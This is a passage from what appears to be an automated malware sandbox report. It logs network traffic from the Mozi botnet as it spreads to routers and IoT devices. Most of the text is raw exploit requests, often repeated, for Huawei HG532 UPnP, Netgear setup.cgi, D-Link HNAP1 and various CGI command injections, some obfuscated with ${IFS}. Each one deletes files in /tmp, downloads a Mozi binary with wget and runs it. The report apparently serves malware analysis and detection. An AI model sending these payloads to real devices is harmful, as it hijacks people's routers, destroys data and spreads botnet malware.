HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 125.125.201.185:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 109.227.125.29:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 196.103.201.163:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 58.37.190.45:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 79.35.50.92:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 178.15.128.55:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 84.51.179.123:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
